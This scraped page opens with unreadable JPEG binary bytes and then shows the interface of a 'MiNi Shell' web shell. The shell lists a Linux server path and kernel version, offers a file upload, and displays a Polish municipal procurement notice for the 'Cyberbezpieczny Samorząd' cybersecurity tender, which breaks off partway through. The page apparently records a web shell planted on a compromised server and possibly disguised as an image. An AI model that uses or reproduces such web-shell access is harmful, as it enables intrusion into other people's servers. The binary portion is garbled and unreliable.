JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250516/0023441301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Cyberbezpieczny Samorząd” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lniano</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351021</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wyzwolenia 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lniano</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-141</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@lniano.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lniano.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Cyberbezpieczny Samorząd” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b6b4955f-effa-446b-b1a7-66c13b90773d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00234413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00048997/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 &#34;Cyberbezpieczny Samorząd&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC) konkurs grantowy w ramach Projektu grantowego &#34;Cyberbezpieczny Samorząd&#34; o numerze FERC.02.02-CS.01-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1105427 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzieleniu zamówienia,w tym składania ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą , z uwzględnieniem<br/>wyjątków określonych w ustawie Pzp odbywa się przy użyciu środków komunikacji elektronicznej. Ofertę, oświadczenia, podmiotowe<br/>środki dowodowe, przedmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza<br/>się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt,rtf,.pdf,.doc,. docx, .odt.<br/>Ofertę, a także oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonym podpisem zaufanym lub<br/>podpisem osobistym. Adres strony internetowej: https://platformazakupowa.pl/transakcja/1105427</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformie, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformie odbywa się za pomocą protokołu TLS 1.3.<br/>7) Oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB. natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.W korespondencji kierowanej do<br/>Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ze względu na ograniczoną ilość znaków w niniejszej sekcji ogłoszenia informacje<br/>dotyczące RODO znajdują się w Specyfikacji Warunków Zamówienia . SWZ dostępne pod adresem postępowania https://platformazakupowa.pl/transakcja/1105427</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GŚiZP.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I Zamówienia:<br/>Przedmiotem zamówienia jest przeprowadzenie dwóch audytów – wstępnego i obowiązkowego (końcowego) – wdrożonego systemu zarządzania bezpieczeństwem informacji w pełnym zakresie KRI, wykonanie opracowania szacowania ryzyka zgodnego z Rozporządzenie KRI oraz przeprowadzenie cyklu szkoleń z zakresu podstaw cyberbezpieczeństwa dla pracowników i kadry kierowniczej Zamawiającego, szkolenia dla pracownika IT z obecnych i dostarczonych rozwiązań oraz z zakresu cyberbezpieczeństwa oraz wykonanie testów socjotechnicznych i penetracyjnych wobec pracowników Zamawiającego. <br/>Szczegółowy opis przedmiotu zamówienia określający wymagania techniczne, specyfikację oraz zakres wdrożenia Zamawiającego określono w Załączniku nr 1a do SWZ – Szczegółowy opis przedmiotu zamówienia na audyt wdrożonego systemu bezpieczeństwa informacji oraz cykl szkoleń w ramach konkursu grantowego „Cyberbezpieczny Samorząd”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79212000-3 - Usługi audytu</p> <p class="mb-0">72222300-0 - Usługi w zakresie technologii informacji</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II Zamówienia:<br/>Przedmiotem zamówienia jest dostawa i wdrożenie sprzętu informatycznego w siedzibie Zamawiającego.<br/>Zakres przedmiotowego zamówienia obejmuje:<br/>a) dostawę w zakresie:<br/>- serwer (1 sztuka)<br/>- serwerowy system operacyjny (4 sztuki)<br/>- macierz (1 sztuka)<br/>- UPS (1 sztuka)<br/>- przełącznik sieciowy (1 sztuka)<br/>- Access Point (3 sztuki)<br/>- Serwer NAS z dyskami<br/>- Mini UPS (26 sztuk)<br/>b) wdrożenie w zakresie:<br/>- serwer z macierzą<br/>- przełączników sieciowych<br/>- instalację punktów dostępowych (AP)<br/>- System NAS<br/>- UPS<br/>- testy powdrożeniowe.<br/>Szczegółowy opis przedmiotu zamówienia określający wymagania techniczne, specyfikację oraz zakres wdrożenia Zamawiającego określono w Załączniku nr 1b do SWZ – Szczegółowy opis przedmiotu zamówienia na dostawę i wdrożenie sprzętu informacyjnego w ramach konkursu grantowego „Cyberbezpieczny Samorząd”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72225000-8 - Usługi w zakresie oceny i analizy gwarancji jakości systemu</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">30233132-5 - Napędy dyskowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III Zamówienia:<br/>Przedmiotem zamówienia jest dostawa agregatu prądotwórczego do siedziby Zamawiającego. <br/>Agregat powinien być wykonany zgodnie z obowiązującymi normami i standardami:<br/>• 2006/42/CE Bezpieczeństwo maszyn.<br/>• Kompatybilność elektromagnetyczna 2014/30/UE.<br/>• 2014/35/UE sprzętu elektrycznego przewidzianego do stosowania w określonych granicach napięcia<br/>• 2000/14/WE Poziom hałasu. Emisja hałasu na zewnątrz urządzenia. (ze zmianami wprowadzonymi przez 2005/88/WE)<br/>• Emisji zanieczyszczeń gazowych i pyłowych 97/68/WE. (ze zmianami wprowadzonymi przez 2012/46/EU)<br/>• EN 12100, EN 13857, EN 60204<br/> Szczegółowy opis przedmiotu zamówienia określający wymagania techniczne, specyfikację oraz zakres wdrożenia Zamawiającego określono w Załączniku nr 1c do SWZ – Szczegółowy opis przedmiotu zamówienia na dostawę i wdrożenie sprzętu informacyjnego w ramach konkursu grantowego „Cyberbezpieczny Samorząd”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31122000-7 - Jednostki prądotwórcze</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <p class="mb-0">31154000-0 - Bezprzestojowe źródła energii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie części I zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:1) zdolności do występowania w obrocie gospodarczym:Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie stawia warunku w powyższym zakresie.3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.4) zdolności technicznej lub zawodowej:Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) W okresie ostatnich 4 lat, zrealizował co najmniej jeden audyt cyberbezpieczeństwa (niewskazany w pkt. b, c, d załącznika 1a do SWZ „Szczegółowego opisu przedmiotu zamówienia…”) o wartości co najmniej 50 000,00 zł brutto w podmiocie realizującym zadania publiczne, potwierdzony referencjami; b) Zrealizował co najmniej dwa inne audyty bezpieczeństwa informacji z testami penetracyjnymi (niewskazany w pkt. a, c, d<br/>załącznika 1a do SWZ „Szczegółowego opisu przedmiotu zamówienia…”) o wartości co najmniej 50 000,00 zł brutto w<br/>podmiocie realizującym zadania publiczne, potwierdzony referencjami;<br/>c) Zrealizował co najmniej cztery inne (niewskazane w pkt. a, b, d załącznika 1a do SWZ „Szczegółowego opisu przedmiotu<br/>zamówienia…”) audyty cyberbezpieczeństwa o wartości co najmniej 20 000,00 zł brutto w podmiotach realizujących zadania<br/>publiczne, potwierdzone referencjami;<br/>d) Wykonał co najmniej 15 innych audytów bezpieczeństwa informacji,<br/>e) Wykonał co najmniej dwa projekty dotyczące szacowania ryzyka dla bezpieczeństwa danych w systemach<br/>informatycznych, potwierdzonych referencjami,<br/>f) Wykonał co najmniej dwa projekty polegające na świadczeniu usług w zakresie stworzenia dokumentacji systemu<br/>zarządzania bezpieczeństwem informacji dla podmiotów publicznych.<br/>g) Posiada zespół składający się z co najmniej 3 osób, w tym:<br/>• minimum 2 osób posiadających wiedzę i doświadczenie w zakresie audytowania systemów zarządzania bezpieczeństwem<br/>informacji przy spełnieniu wymagań dla audytorów IRCA, CQI lub wymagań równoważnych, tj. określonych na nie niższym<br/>poziomie jakości, potwierdzonych zaświadczeniem ukończenia kursu Information Security Management Systems (ISMS)<br/>Auditor lub innym równoważnym dokumentem;<br/>• minimum 2 osób posiadających aktualne uprawnienia wykazane w Rozporządzeniu Ministra Cyfryzacji z dnia 12<br/>października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu;<br/>• minimum 1 osobę posiadającą kompetencje w zakresie audytowania systemów zarządzania ciągłością działania przy<br/>spełnieniu wymagań dla audytorów wiodących Systemu Zarzadzania Ciągłością Działania zgodnego z normą PN-EN ISO<br/>22301 lub wymagań równoważnych, tj. określonych na nie niższym poziomie jakości, potwierdzone ważnym certyfikatem<br/>dla Audytora Wiodącego Systemu Zarzadzania Ciągłością Działania zgodnego z normą PN-EN ISO 22301 po zdaniu<br/>egzaminu lub innym równoważnym dokumentem (zaświadczeniem);<br/>• minimum 2 osób posiadających kompetencje w zakresie audytowania systemów zarządzania jakością przy spełnieniu<br/>wymagań dla audytorów wewnętrznych Systemu Zarzadzania Jakością zgodnego z normą PN-EN ISO 9001 lub wymagań<br/>równoważnych, tj. określonych na nie niższym poziomie jakości, potwierdzone ważnym certyfikatem dla Audytora<br/>Wewnętrznego Systemu Zarzadzania Jakością zgodnego z normą PN-EN ISO 9001 po zdaniu egzaminu lub innym<br/>równoważnym dokumentem (zaświadczeniem);<br/>• minimum 2 osób posiadających wiedzę i doświadczenie w zakresie ochrony danych osobowych potwierdzone dyplomem<br/>ukończenia studiów podyplomowych w zakresie ochrony danych osobowych oraz posiadającymi co najmniej 8 letnie<br/>doświadczenie w pełnieniu funkcji Inspektora Ochrony Danych / Administratora Bezpieczeństwa Informacji;<br/>• minimum 1 osobę posiadającą wiedzę i doświadczenie w zakresie wdrażania systemów zarządzania bezpieczeństweminformacji zgodnie z normą ISO 27001 lub wymagań równoważnych, tj. określonych na nie niższym poziomie jakości,<br/>potwierdzone ważnym certyfikatem ukończenia szkolenia w tym zakresie lub innym równoważnym dokumentem<br/>(zaświadczeniem) oraz uczestniczącą w projektach wdrożenia systemu zarządzania bezpieczeństwem informacji na<br/>podstawie Rozporządzenia KRI w przynajmniej dwóch podmiotach publicznych;<br/>• minimum 1 osobę posiadającą wiedzę i doświadczenie w zakresie ryzyka w ochronie informacji potwierdzoną ważnym<br/>certyfikatem ukończenia szkolenia w tym zakresie lub innym równoważnym dokumentem (zaświadczeniem);<br/>• minimum 2 